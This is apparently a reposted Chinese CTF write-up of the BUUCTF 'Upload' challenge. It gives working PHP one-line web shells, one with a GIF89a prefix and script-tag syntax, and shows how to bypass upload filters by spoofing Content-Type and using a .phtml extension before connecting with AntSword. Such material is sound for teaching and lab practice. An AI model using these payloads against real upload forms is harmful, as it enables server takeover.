当前位置:网站首页>[极客大挑战 2019]Upload

[极客大挑战 2019]Upload

2022-08-09 12:49:00 开心星人

evil.php

<?php eval($_POST['evil'])?>

在这里插入图片描述

可能是前端的验证或者是后端Content-type的校验。
在这里插入图片描述
所以不仅仅是前端的校验。

我们更改Content-Type为image/jpeg
在这里插入图片描述

同时更改Content-type为image/jpeg和文件后缀名为jpg(这样可能不会以php解析,所以绕过了后缀名检验也是没有意义的)
在这里插入图片描述

尝试将后缀名更改为php3、php4、php5、phtml、pht
在这里插入图片描述

发现phtml可以绕过
在这里插入图片描述

更换一句话木马

GIF89a? <script language="php">eval($_POST['evil'])</script>

在这里插入图片描述
上传成功
访问/upload目录 (猜的,一般都是upload目录)

访问http://2d30c63d-d4db-41c3-9f02-91348f6274c7.node4.buuoj.cn:81/upload/
在这里插入图片描述
访问一下我们上传的文件
http://2d30c63d-d4db-41c3-9f02-91348f6274c7.node4.buuoj.cn:81/upload/evil.phtml
在这里插入图片描述
用antsword连接
在这里插入图片描述
根目录下发现flag

原网站

版权声明
本文为[开心星人]所创,转载请带上原文链接,感谢
https://blog.csdn.net/qq_55675216/article/details/126241089